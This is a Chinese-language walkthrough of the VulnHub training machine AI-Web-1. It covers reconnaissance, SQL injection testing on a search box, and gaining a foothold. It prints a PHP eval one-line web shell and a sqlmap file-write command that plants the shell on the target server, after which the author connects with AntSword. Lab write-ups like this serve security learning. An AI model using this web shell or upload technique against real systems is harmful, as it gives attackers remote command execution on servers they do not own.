下载地址：
https://www.vulnhub.com/entry/ai-web-1,353/
下载压缩文件打开

开启虚拟机

二、信息收集

1.查看NAT模式IP段

编辑–>虚拟网络编辑器

御剑2014查IP

找到ip之后就访问网站

用扫描目录的工具扫描当前网站的目录

 访问robots.txt

 这几个文件都访问一下，发现都是一个界面、

用御剑对这两目录扫描

info.php中有我们需要的信息

在这个页面看到搜索框可以尝试注入了

三、注入 

1.尝试SQL注入

判断是否有SQL注入

在输入框输入

1' //有报错信息
1//有结果

抓包设置注入点，然后用工具sqlmap去注入

但是很重要的一点是，你查出所有的数据，没有输入的地方，很尴尬，那就用sqlmap去写入提权

一句话木马

<?php @eval ($_POST['cmd']); ?>

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --file-write C:\Users\1\Desktop\shell.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

 能访问证明写入成功

然后继续用蚁剑连接